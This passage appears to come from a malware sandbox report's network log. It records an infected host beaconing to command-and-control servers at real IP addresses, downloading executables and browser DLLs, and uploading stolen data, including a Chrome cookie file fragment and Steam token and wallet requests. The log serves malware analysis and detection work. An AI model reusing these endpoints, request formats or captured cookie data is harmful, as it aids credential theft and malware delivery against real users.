name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------BFBKFHIDHIIJJKECGHCFContent-Disposition: form-data; name="message"plugins------BFBKFHIDHIIJJKECGHCF--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCFHost: 91.202.233.158Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 2d 2d 0d 0a Data Ascii: ------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="message"fplugins------IJJJKEGHJKFHJKFHDHCF--
Source: global traffic HTTP traffic detected: GET /inc/cccc2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 91.202.233.158Content-Length: 7159Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/sqlite3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCHost: 91.202.233.158Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 2d 2d 0d 0a Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nU
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file"------KKKKEHJKFCFCBFHIIDGD--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000354001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIEHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 2d 2d 0d 0a Data Ascii: ------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file"------JKJEHJKJEBGHJJKEBGIE--
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/freebl3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/mozglue.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000355001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/msvcp140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/neon.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/nss3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/softokn3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/vcruntime140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBHost: 91.202.233.158Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000356001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJHost: 91.202.233.158Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 2d 2d 0d 0a Data Ascii: ------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="message"wallets------FHIEBKKFHIEGCAKECGHJ--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIIJDHJEGIECBGHIJEHost: 91.202.233.158Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 49 4a 44 48 4a 45 47 49 45 43 42 47 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------GIIIIJDHJEGIECBGHIJEContent-Disposition: form-data; name="message"files------GIIIIJDHJEGIECBGHIJE--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file"------DGHJEHJJDAAAKEBGCFCA--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 91.202.233.158Content-Length: 140619Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000357001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 91.202.233.158Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 2d 2d 0d 0a Data Ascii: ------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="message"ybncbhylepme------DAEGIDHDHIDGIEBGIJEH--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBHost: 91.202.233.158Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AEBAFBGIDHCBFHIECFCB--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 37 34 46 43 41 46 39 31 36 41 36 44 43 45 41 46 34 41 33 38 32 33 39 43 46 30 39 30 33 30 33 30 33 35 39 38 38 39 42 34 36 44 41 30 44 36 43 36 34 39 41 42 30 30 38 32 46 44 30 32 41 44 38 43 37 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B574FCAF916A6DCEAF4A38239CF0903030359889B46DA0D6C649AB0082FD02AD8C7
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
